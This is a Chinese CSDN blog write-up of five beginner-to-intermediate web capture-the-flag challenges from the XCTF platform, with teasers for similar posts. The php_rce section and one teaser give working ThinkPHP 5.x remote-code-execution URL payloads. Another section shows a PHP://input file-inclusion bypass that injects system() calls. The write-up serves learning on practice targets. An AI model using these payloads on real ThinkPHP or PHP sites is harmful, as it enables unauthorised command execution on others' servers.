攻防世界web 进阶1~5

最新推荐文章于 2023-10-30 10:18:51 发布
最新推荐文章于 2023-10-30 10:18:51 发布
阅读量2.4k 收藏
点赞数
文章标签: php web安全 tornado
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yu_jing_hong/article/details/121543485
版权

1.baby_web

找初始页面

一般的,初始页面是index.php,就在地址栏进入,但发现还是会回调到1.php这个页面,那么接在在开发者工具打开network查看index.php的情况。

得到响应头里的flag ,结束。

补充一点知识

302状态码:302 表示临时性重定向。访问一个Url时,被重定向到另一个url上。常用于页面跳转。

在响应头中加入Location参数。浏览器接受到带有location头的响应时,就会跳转到相应的地址。

如下方的,location跳转地址是1.php.

2.Training-WWW-Robots 

看题目的意思是让我们认识一下robots.txt,之前有在新手题做过它的介绍,就不多讲了,直接在地址栏访问robots.txt

 不被允许的有一个fl0g.php页面,尝试访问它

 轻松得到flag,结束

3.php_rce

了解一下thinkphp5 rce漏洞

该漏洞是由于框架对控制器名没有进行敏感字符检测,导致在没有开启强制路由的情况下可能导致远程代码执行。主要影响的版本为5.0.23和5.1.31之前的所有版本。

payload:

5.0.x版本

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("ls");%27

再找flag

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("find / -name 'flag'");%27

查看flag

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("cat ../../../flag");%27 

4.Web_php_include

①strstr(str1,str2)函数:用来判断 str2是否是str1的子串,若是则返回str2在str1中首次出现的地址,若不是返回NULL。

比如: 
char str2 = “cdef”; 
char str1 = “abcdefgh”; 
则通过函数,将返回 
strstr(str1,str2) = cdefgh;

如果str1不包含有str2。 
char str2 = “cxef”; 
char str1 = “abcdefgh”; 
则通过函数,将返回 
strstr(str1,str2) = NULL;

②str_replace("php://", "", $page);

$page里的php://替换成"",说明php://会被替换为空,因为这个函数区分大小写,可以大小写绕过,如写成PHP://input

php://input简单介绍:

作为PHP输入流,只读取Content-Type不为multipart/form-data的数据

可以用burpsuit,显示包含的所有文件   <?php system("ls");?>

看到响应这边有fl4gisisish3r3.php   index.php    phpinfo.php  

 试一下第一个   <?php system("cat fl4gisisish3r3.php");?>

然后就得到了flag=ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}

5.isc-06

看到这里报表可以点 ,看到/index.php?id=1,遍历id,用burpsuit字典爆破,上传字典后,start attack,  开始爆破

 这里2333显示不一样,id=2333试一下

得到flag=cyberpeace{9c319fd203b181c0775c57d01c657d1e}

yu_jing_hong
关注
攻防世界-web进阶
楼阁de猫的博客
10-30 998
目录baby_webTraining-WWW-Robots baby_web 题目描述:想想初始页面是哪个 打开链接看到这个界面 这里有两种解法 法一:我们输入index.php ,就会立即跳转到1.php 那我们就对index.php抓包看看 在请求头看到flag:flag{very_baby_web} 法二:题目提示说初始界面,但是url后面会自动跳转到1.php,我们可以在控制台找到初始界面, 按F12进入控制台点开原始的网址就可以看到 Training-WWW-Robots 打开链接是这样一个
攻防世界-web高手进阶
zji
04-25 6657
文章目录攻防世界-web高手进阶区一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结 攻防世界-web高手进阶区 提示:这里是记录web的题目,这里我基本不讲很多细节,请自行下载Burpsuite,web使用的等等工具。 一、baby_web 非常的简单,bp抓包直接把1.php去掉后,就看的flag了。 二、Training-WWW-Robots 非常的简单,点网页进去后,看到了robots.txt进去看到一个可以看到他有一个不允许访问的文件f10g.php,在
攻防世界 web进阶1
weixin_63231007的博客
03-30 267
003PHP2 通过index.phps查看源码得知: 代码审计得知,我们需要将传递的id,经过浏览器自动url解码,与urldecode()函数两次解码后等于admin,才可得到flag。使用burp_suite decoder模块 得知%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65两次url解码后为admin。将其传入id,得到flag。 004 Web_php_unserialize 首先看到源码,出现敏感函数wakeup,考虑绕过反序列化
攻防世界web高手进阶Web_php_include
weixin_61835841的博客
04-25 2027
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 工具 火狐,burpsuite 分析 代码审计: strstr():区分大小写 str_replace:替换函数 补充: 函数原型:mixed str_replace ( mixed $search , mixed $replace , mixed $subject [, int &$count ] )参数说明:$search要被搜索替换的字符串,$replace要替换搜索的字符串,$subject操作...
攻防世界-web-高手进阶区-mfw
wyj_1216 House
07-09 3353
题目 writeup 查看页面源代码 发现: ?page=flag 于是尝试一下 发现可访问,但是没东西 于是尝试看看其他地方 发现About页面 看到了Git 怀疑是git泄露 于是利用dirsearch扫一下 发现了/.git/ 访问 利用GitHack下载源码 得到一个以url命名的文件夹 打开发现了flag.php 但是啥都没有 再看index.php 即 <?ph...
攻防世界-Web进阶篇-005unserialize3】
gyy990526的博客
03-14 2812
解:打开靶机是一段php代码,最后问你?code=应该等于多少,看见_wakeup()就是典型的反序列化的题。 题目比较简单,只有一个xctf类,首先需要对其实例化,再用serialize进行序列化输出字符串 : <?php class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } } $xctf=new xc
攻防世界web进阶区全讲解(超详细的哇)!!(持续更新)
wo41ge的博客
10-13 2516
进入题目链接 有登录 就可能有注册界面 url栏register.php 或者直接上御剑扫一下 同样发现注册界面 注册成功后 进行登录 跳转到了这个界面
攻防世界 web 进阶 web2
weixin_42499640的博客
08-10 5182
进来是这样的 逆向这个加密算法 把给出的字符串逆向解密就能得到flag 简单审计一下代码 <?php $miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws"; function encode($str){ $_o=strrev($str); //反转字符串 // echo $_o; ...
攻防世界 web高手进阶区 10分题 xss1
闵行小鱼塘
11-10 779
继续ctf的旅程,开始攻防世界web高手进阶区的10分题,本文是xss1的writeup
攻防世界 web高手进阶区 10分题 Guess
闵行小鱼塘
11-03 1386
继续ctf的旅程,开始攻防世界web高手进阶区的10分题,本文是Guess的writeup
攻防世界-web】baby_web
最新发布
weixin_73625393的博客
10-30 618
1.根据题目描述是关于初始化页面,网页的初始化页面一般为index.php、index.html、index.jsp、index.asp等。3.在场景页面按F12,看源码中的网络,这里还没有内容,需要在上方url中再次发送/index.php请求。2.在页面url后添加/index.php,发现输了内容,但没显示,直接跳转到1.php了。发现flag值:flag{very_baby_web}如果页面不对会直接报错,并显示url信息。发现index.php存在,点击查看。
攻防世界-Web
LOVEQILING的博客
07-19 322
学习记录一下攻防世界web
攻防世界baby_web
知足且坚定,温柔且上进
01-23 9812
题目描述:想想初始页面是哪个 打开链接,发现跳转到了1.php 根据题目描述 初始页面,我们知道,index一般为页面默认页,我们试试index.php,还是自动跳转到1.php,这是我们F12进入开发者模式,进入网络选项卡,发现有Index.php的文件,找到flag 我试了用Burpsuite抓包同样也能做出来,注意:我把起先的1.php改成了index.php,得到 响应 Flag i...
攻防世界web新手部分,进阶部分
舞动的獾
04-08 4775
title: 攻防世界第一题 date: 2019-04-08 19:31:23 author: 舞动之獾 top: false cover: true coverImg: https://img-blog.csdnimg.cn/20190408193755785.PNG categories: Markdown tags: web 网络安全 攻防世界新手第一题writeup 点击传送地址...
攻防世界web进阶区刷题记录(1)
bmth666的博客
03-27 4789
文章目录webbaby_webTraining-WWW-Robotsphp_rceWeb_php_include方法1方法2方法3warmupNewsCenter web baby_web 提示是:想想初始页面是哪个 进入是一个hello world,然后就没有了,由于提示试试抓包,得到flag Training-WWW-Robots 由于提示我们就查看robots.txt 获得flag p...
攻防世界-web-进阶-baby_web
weixin_31610083的博客
09-28 1768
【题目描述】 想想初始页面是哪个 【附件】 在线场景 【过程及思路】 进入在线场景,页面如下。 观察URL,当前所在页面是1.php。提示让我们去找初试页面,先想到了index.php。 尝试后发现又跳回index.php了,可能是加了自动跳转。 按F12查看一下浏览器的网络结构,发现index.php确实存在,根据它们的活动顺序也应该是自动跳转至了1.php,如下图。 究竟是不是跳转呢? 光猜是不靠谱的,我们要看一下返回包的状态:点击表头(Header)...
攻防世界(web高手进阶区)——1~20题
weixin_43610673的博客
03-29 6860
baby_web Training-WWW-Robots php_rce ?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("cat%20../../../flag");%27...
攻防世界--ics-02
qq_46263951的博客
01-06 1054
初始页面,看到这种页面就比较头疼,无从下手 先来扫下目录 download会让我们下载一个ssrf的pdf文件 secret目录下包含着secret.php和secret_debug.php login页面显示
攻防世界——web新手和引导模式(全解)
热门推荐
小白一枚多多关注的博客
12-20 2万+
全新攻防世界web新手题目,小白重新归来
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值